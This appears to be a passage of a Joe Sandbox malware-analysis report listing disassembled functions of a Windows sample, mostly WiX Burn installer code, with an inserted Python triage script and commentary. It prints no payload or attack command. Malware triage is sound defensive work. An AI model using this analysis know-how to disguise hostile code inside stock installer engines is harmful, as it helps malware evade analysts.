• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CompareString
• String ID: Failed dependents check on bundle.$Failed to detect provider key bundle id.$d:\a\wix\wix\src\burn\engine\dependency.cpp
• API String ID: 1825529933-3310408215
• Opcode ID: e5740c048b6a1461adc061db8391333ed37bd94c48a9026d394b0263fe6ad2e9
• Instruction ID: 0d96d744af2de9542a9b5d525fd2047731e6b394b5f2d98a884b53e8880dac83
• Opcode Fuzzy Hash: e5740c048b6a1461adc061db8391333ed37bd94c48a9026d394b0263fe6ad2e9
• Instruction Fuzzy Hash: 6B31AF32A04215BAEB219B54CC45FDAB664BF04760F600366F9186B2D0D3B8A9D5CBD9
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: _memcpy_s
• String ID: Failed to ensure buffer size.$Failed to get ANSI string size.$Failed to write string to buffer: '%hs', error: %d$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\buffutil.cpp
• API String ID: 2001391462-267237466
• Opcode ID: b21fd61335e95e85789d4dd1f762be2529bc0c197e1454bffc15f1ea8b192ffa
• Instruction ID: f59bc742998e8d32b229e40e410394e9b2c19e6f5283daf5e4822557a660fa2d
• Opcode Fuzzy Hash: b21fd61335e95e85789d4dd1f762be2529bc0c197e1454bffc15f1ea8b192ffa
• Instruction Fuzzy Hash: 7A210772B00714BBDB119A45CC85F6F3B6CEF86764F1501ABF914BB281F2389D009AA6
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00466C84
• GetLastError.KERNEL32 ref: 00466C8E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ErrorLastLookupPrivilegeValue
• String ID: Failed to get privilege LUID: %ls$Failed to get token privilege information.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\procutil.cpp
• API String ID: 2626710698-864132060
• Opcode ID: d9aa73c01fe2d0f2b169b26e9ef2a335459d2d93b786017b5b76a8c0b04486e8
• Instruction ID: 07320f937179924f8d5654f6ef20a5b4ee6e23cc1efcaddef25a3656187ea6d1
• Opcode Fuzzy Hash: d9aa73c01fe2d0f2b169b26e9ef2a335459d2d93b786017b5b76a8c0b04486e8
• Instruction Fuzzy Hash: 55210A72B00218BBDB219F45CC81E9E7BB8DF41754F124057FD04BB280E27C9D00876A
APIs
• CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?), ref: 0043A7DA
Strings
• d:\a\wix\wix\src\burn\engine\relatedbundle.cpp, xrefs: 0043A850, 0043A882
• Failed to ensure there is space for related bundles., xrefs: 0043A805
• Failed to initialize package from related bundle id: %ls, xrefs: 0043A83E
• Failed to detect dependencies for related bundle., xrefs: 0043A870
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CompareString
• String ID: Failed to detect dependencies for related bundle.$Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$d:\a\wix\wix\src\burn\engine\relatedbundle.cpp
• API String ID: 1825529933-2130722745
                                                                                                                                                          • Opcode ID: 63feb51c7398c78391ab73a2406486688cc8445016d778b41b54d842fb6dfe56
                                                                                                                                                          • Instruction ID: c24473a3b9e81c254f9c8e9fe76ee4c3dfc4ada51951599e8c1d817cdd45448f
                                                                                                                                                          • Opcode Fuzzy Hash: 63feb51c7398c78391ab73a2406486688cc8445016d778b41b54d842fb6dfe56
                                                                                                                                                          • Instruction Fuzzy Hash: BB212C31A40610BBDF165E58CC46F9A7F64EF08720F104166F914BA1D1E2789821DB96
APIs
  • Part of subcall function 0046F352: lstrlenW.KERNEL32(89F84589,004221A7,00000000,00000000,?,0046F557,00000000), ref: 0046F378
• RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,00000000,?,?,?,0046F68B,00000000,00000000,00000000,00000000), ref: 0046F511
Strings
• Failed to open the registry key for the dependency "%ls"., xrefs: 0046F4AB
• Failed to get the dependency name for the dependency "%ls"., xrefs: 0046F4EC
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 0046F4FB
• Failed to allocate the registry key for dependency "%ls"., xrefs: 0046F45D
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: Closelstrlen
• String ID: Failed to allocate the registry key for dependency "%ls".$Failed to get the dependency name for the dependency "%ls".$Failed to open the registry key for the dependency "%ls".$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp
• API String ID: 3903209405-2614948780
• Opcode ID: 1f5f8754f0fa24b8ab09fa591fd9a7583067d08b5f709ee99bd63fa49b8f8b4a
• Instruction ID: e57c9ddac17fd68183a3b306cd450fb3dd6391c619f5d9261319f073189a26d3
• Opcode Fuzzy Hash: 1f5f8754f0fa24b8ab09fa591fd9a7583067d08b5f709ee99bd63fa49b8f8b4a
• Instruction Fuzzy Hash: A1210532940224F7DF225E94DC0AF9F7A249B10725F114136FD40BA1A1E77C4E54D68B
APIs
• WaitForMultipleObjects.KERNEL32(?,?,000000FF,00000000,00000000,?,?,00439EE2,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 004016DE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: MultipleObjectsWait
• String ID: Abandoned wait for multiple objects, index: %u.$Failed to wait for multiple objects.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apputil.cpp
• API String ID: 862713236-3054627793
• Opcode ID: 71a6d7e5d5d8aafc1a235b46da0f4c8e4f3e189ae5389ccb06775c9b39419504
• Instruction ID: a29376ea05187ce795c136ec9b0efa3e75c17d228e617ed7087ab3cbc6e2bf03
• Opcode Fuzzy Hash: 71a6d7e5d5d8aafc1a235b46da0f4c8e4f3e189ae5389ccb06775c9b39419504
• Instruction Fuzzy Hash: 92212B7AA4132177D72055154C49F9B6A19DB41B61F92407BFE0ABF2F2E67D8C4042EC
APIs
• CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,?,0040AFB0,0040AFB0,?,004098C0,?,?,00000000), ref: 00409AAE
• GetLastError.KERNEL32(?,004098C0,?,?,00000000,?,00000000,0040AFB0,?,0040CB94,?,?,?,?,?), ref: 00409ADD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CompareErrorLastString
• String ID: Failed to compare strings.$d:\a\wix\wix\src\burn\engine\variable.cpp$version.dll
• API String ID: 1733990998-4134225108
• Opcode ID: 83ec1fbd8da41ec6c3158b64551ae333fc62a4e7656c843ebba122aa05e5285d
• Instruction ID: 28ca414a6ea33a8cddb4571491067c2b432cf49378a167bedc0a05dd97f7e598
• Opcode Fuzzy Hash: 83ec1fbd8da41ec6c3158b64551ae333fc62a4e7656c843ebba122aa05e5285d
• Instruction Fuzzy Hash: 04212832A00114ABC7118F9CCC84A6AB774FB49770F25433AF915BB3D1D678ED028BA8
APIs
• CoInitializeEx.OLE32(00000000,00000000), ref: 004373C6
• CoUninitialize.OLE32(?,?,?), ref: 00437469
Strings
• Failed to initialize COM., xrefs: 004373D2
• d:\a\wix\wix\src\burn\engine\baengine.cpp, xrefs: 004373E4
• Failed to get message over bootstrapper application pipe, xrefs: 0043743F
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: InitializeUninitialize
• String ID: Failed to get message over bootstrapper application pipe$Failed to initialize COM.$d:\a\wix\wix\src\burn\engine\baengine.cpp
• API String ID: 3442037557-3548269937
• Opcode ID: 454d8858ac54f3b5a410254df409316567caf17e66a693e4f9b6dd19e74740da
• Instruction ID: e8d767d806275b6992c3b1d340d3e85830efd1794313b262deaba0ef2da6ab16
• Opcode Fuzzy Hash: 454d8858ac54f3b5a410254df409316567caf17e66a693e4f9b6dd19e74740da
• Instruction Fuzzy Hash: 84213E7290461577DB11D6E4CC81DEFB7EC9B1C744F100137FA40F3140E668EE048AA5
APIs
• GetCurrentProcess.KERNEL32(?), ref: 0040A5E3
  • Part of subcall function 00466F79: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,000001D0,00000001,00000120,?,?,?,00471936,00000000), ref: 00466F91
  • Part of subcall function 00466F79: GetProcAddress.KERNEL32(00000000), ref: 00466F98
  • Part of subcall function 00466F79: GetLastError.KERNEL32(?,?,?,00471936,00000000), ref: 00466FC0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: AddressCurrentErrorHandleLastModuleProcProcess
• String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
• API String ID: 896058289-3413941621
• Opcode ID: 8f917638aa28cb1f1d32e4699e94aebe4de276b1bac319f302c25dd8e5bb845b
• Instruction ID: d7110f652bc2343abcb355148a46efeaa9e42b2c8857fba5bbd4c9a0e54b7691
• Opcode Fuzzy Hash: 8f917638aa28cb1f1d32e4699e94aebe4de276b1bac319f302c25dd8e5bb845b
• Instruction Fuzzy Hash: E4110271E803147ADB226A51CC4AF9F7A7CCF60794F55416BF904BA1C1E6B98E1082EE
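Every record in this listing has the same shape: an APIs block (direct calls and "Part of subcall function" calls, each with its import module and a ref address), a Strings block with xrefs, the memory dump source, and a Similarity block whose String ID is a `$`-joined copy of the strings. The recurring `d:\a\wix\wix\src\...` paths are the build-tree paths compiled into the WiX Burn bootstrapper engine. Reading hundreds of such records by hand is slow, so the following Python, an added example that is not part of the Joe Sandbox report and not WiX code, parses records in this format, groups the called APIs by recovered source file, and applies a heuristic that is an assumption of this example (not a Joe Sandbox signature): the code is treated as the Burn engine when every recovered source path sits under `d:\a\wix\wix\src\` and at least one is in `burn\engine\`. The sample input is constructed by copying two records from this section, with the link labels dropped.

```python
import re
from collections import defaultdict

# Constructed sample input: two records copied in the shape of the function
# summaries in this section (link labels dropped, some lines trimmed).
SAMPLE = r"""
APIs
• CoInitializeEx.OLE32(00000000,00000000), ref: 004373C6
• CoUninitialize.OLE32(?,?,?), ref: 00437469
Strings
• Failed to initialize COM., xrefs: 004373D2
• d:\a\wix\wix\src\burn\engine\baengine.cpp, xrefs: 004373E4
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: InitializeUninitialize
• String ID: Failed to get message over bootstrapper application pipe$Failed to initialize COM.$d:\a\wix\wix\src\burn\engine\baengine.cpp
• API String ID: 3442037557-3548269937
• Instruction Fuzzy Hash: 84213E7290461577DB11D6E4CC81DEFB7EC9B1C744F100137FA40F3140E668EE048AA5
APIs
• GetCurrentProcess.KERNEL32(?), ref: 0040A5E3
  • Part of subcall function 00466F79: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,000001D0,00000001,00000120,?,?,?,00471936,00000000), ref: 00466F91
  • Part of subcall function 00466F79: GetProcAddress.KERNEL32(00000000), ref: 00466F98
  • Part of subcall function 00466F79: GetLastError.KERNEL32(?,?,?,00471936,00000000), ref: 00466FC0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressCurrentErrorHandleLastModuleProcProcess
• String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
• API String ID: 896058289-3413941621
• Instruction Fuzzy Hash: E4110271E803147ADB226A51CC4AF9F7A7CCF60794F55416BF904BA1C1E6B98E1082EE
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# "• [Part of subcall function XXXX: ]Name.MODULE(args), ref: ADDR"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<mod>[A-Z0-9]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)$")
# "• some string, xrefs: ADDR[, ADDR...]"
STR_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<xrefs>[0-9A-F]+(?:, [0-9A-F]+)*)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
                      r"Opcode Fuzzy Hash|Instruction Fuzzy Hash): (?P<val>.*)$")
# A build-tree source path embedded as a string, e.g. d:\a\wix\...\baengine.cpp
SRC_RE = re.compile(r"^[a-z]:\\[^$]*\.(?:cpp|c|h|hpp)$", re.IGNORECASE)


def parse_records(text):
    """Split the listing into records (one per 'APIs' header) and collect
    API calls, referenced strings, Similarity fields and source paths."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            section = line
            if line == "APIs":
                cur = {"apis": [], "strings": [], "source_files": [], "fields": {}}
                records.append(cur)
            continue
        if cur is None:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            cur["apis"].append({"name": m["name"], "module": m["mod"],
                                "ref": m["ref"], "subcall": m["sub"]})
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur["strings"].append(m["text"])
            _note_source(cur, m["text"])
        elif section == "Similarity" and (m := FIELD_RE.match(line)):
            cur["fields"][m["key"]] = m["val"]
            if m["key"] == "String ID":  # '$'-joined copy of the strings block
                for part in m["val"].split("$"):
                    _note_source(cur, part)
    return records


def _note_source(rec, text):
    if SRC_RE.match(text) and text not in rec["source_files"]:
        rec["source_files"].append(text)


def apis_by_source(records):
    """Map each recovered source file to the sorted set of APIs its records call."""
    out = defaultdict(set)
    for rec in records:
        key = rec["source_files"][0] if rec["source_files"] else "<no source path>"
        out[key].update(a["name"] for a in rec["apis"])
    return {k: sorted(v) for k, v in out.items()}


def source_roots(records, depth=5):
    r"""Leading path components of every source path, e.g. d:\a\wix\wix\src."""
    return {"\\".join(p.split("\\")[:depth])
            for rec in records for p in rec["source_files"]}


def looks_like_wix_burn(records):
    r"""Heuristic assumed by this example (not a Joe Sandbox signature): every
    source path is under d:\a\wix\wix\src and one of them is in burn\engine."""
    if source_roots(records) != {r"d:\a\wix\wix\src"}:
        return False
    return any("\\burn\\engine\\" in p for rec in records for p in rec["source_files"])


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for src, apis in apis_by_source(recs).items():
        print(src, "->", ", ".join(apis))
    print("WiX Burn engine code:", looks_like_wix_burn(recs))
```

For triage this separates the two kinds of record in the report: those carrying WiX build-tree paths describe the stock installer engine the sample is wrapped in, while records with no source path (or with strings that belong to neither WiX nor a known library) are the ones to read first when looking for the payload's own code. The function at 0040A5E3 above is a good illustration: resolving `IsWow64Process2` from kernel32 through `GetProcAddress` looks like evasion when seen in isolation, but together with the `variable.cpp` string it is Burn's routine for finding the 64-bit shell folders.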
APIs
  • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
  • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
• CreateWellKnownSid.ADVAPI32(001F01FF,00000000,00000000,?,00000044,00000001,00000000,0041C5A0,?,?,?,0041C296,001F01FF,0041C5BC,00000000,00000000), ref: 0041B544
• GetLastError.KERNEL32(?,?,0041C296,001F01FF,0041C5BC,00000000,00000000,?,0041C5A0,0000001A,001F01FF,?,00000000,00000000,?), ref: 0041B54E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocCreateErrorKnownLastProcessWell
                                                                                                                                                          • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 1343019080-1000434226
                                                                                                                                                          • Opcode ID: 3627e87e74679bdbae715f21b8ce528e62286a42d5cc8401fb030f3f8b1a6cfd
                                                                                                                                                          • Instruction ID: 6fd43fa38fa332ee6f9cb697e49224ac34e9cd4d0d6158f40057cfd6ffe5fe9d
                                                                                                                                                          • Opcode Fuzzy Hash: 3627e87e74679bdbae715f21b8ce528e62286a42d5cc8401fb030f3f8b1a6cfd
                                                                                                                                                          • Instruction Fuzzy Hash: 8F110872A4132077E220A7165C4AF9B691DCB81FA4F11046BBD08FB2D1E6BCDD8082EC
APIs
• Sleep.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,0041C6C2,00000000,00000001,80000005,00000000,00000000,00000000,00000000), ref: 004701EB
• SetNamedSecurityInfoW.ADVAPI32(00000000,00000000,80000005,00000001,00000000,0041C6C2,?,00000000,00000000,00000000,00000000,00000000,?,?,0041C6C2,00000000), ref: 00470206
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: InfoNamedSecuritySleep
• String ID: Failed to copy object to secure.$Failed to set security on object '%ls' after %u retries.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\aclutil.cpp
• API String ID: 2352087905-3317911174
• Opcode ID: 3aa0f6fd213d519302eaaa4c6b0a9bb67b15e13fe0dd73f9438f2a965b5c5542
• Instruction ID: d1a7814a5d6a6a257d74c5af4dcd229c5b810ea33478ee7d8dddcf94cb646245
• Opcode Fuzzy Hash: 3aa0f6fd213d519302eaaa4c6b0a9bb67b15e13fe0dd73f9438f2a965b5c5542
• Instruction Fuzzy Hash: 77110833A41229FBDF225E818C49FCF3E29EF45B54F014156FE0876291D2798D60D798
APIs
• FormatMessageW.KERNEL32(00000900,?,?,00000000,00000002,00000000,00000000,00000000,?,?,00466067,00423B83,?,?,00000000,00000001), ref: 0046571A
• GetLastError.KERNEL32(?,00466067,00423B83,?,?,00000000,00000001,?,00409899,00423B83,?,00000000,?,?,00423B83,00000002), ref: 00465726
• LocalFree.KERNEL32(00000000,00423B83,?,00000002,?,?,00466067,00423B83,?,?,00000000,00000001,?,00409899,00423B83,?), ref: 004657AC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ErrorFormatFreeLastLocalMessage
• String ID: d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\logutil.cpp$failed to log id: %d
• API String ID: 1365068426-740000392
• Opcode ID: 95438bb767032eb373913d630e8590fd0760776a865a7e9d34190e5ac23bfca9
• Instruction ID: 4529c9c924ece6e36a27b410a2fc07dee2fa96dfb78d365ed70fcf1d123d2c81
• Opcode Fuzzy Hash: 95438bb767032eb373913d630e8590fd0760776a865a7e9d34190e5ac23bfca9
• Instruction Fuzzy Hash: 4A21D532600629FBDB219F809D45FAF3B6DEF54721F11006AFD14A6161E7348D50E6A9
APIs
• GetComputerNameW.KERNEL32(?,00000010), ref: 0040A6CE
• GetLastError.KERNEL32 ref: 0040A6D8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ComputerErrorLastName
• String ID: Failed to get computer name.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
• API String ID: 3560734967-4183610518
• Opcode ID: 90e672cf87e7c6608edbc50c27b201382d720dc38346a22b4c392601aba55c67
• Instruction ID: 06708cf136fdadc60708c83ef7b3b464170fd286a2578fd3b092d9d84ca13aae
• Opcode Fuzzy Hash: 90e672cf87e7c6608edbc50c27b201382d720dc38346a22b4c392601aba55c67
• Instruction Fuzzy Hash: 6B11B432E4122877E320A6548C46FDF77AC9B08B64F91407AFD04BB2C1EA78AD0047E9
APIs
• SysFreeString.OLEAUT32(00000000), ref: 00473107
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
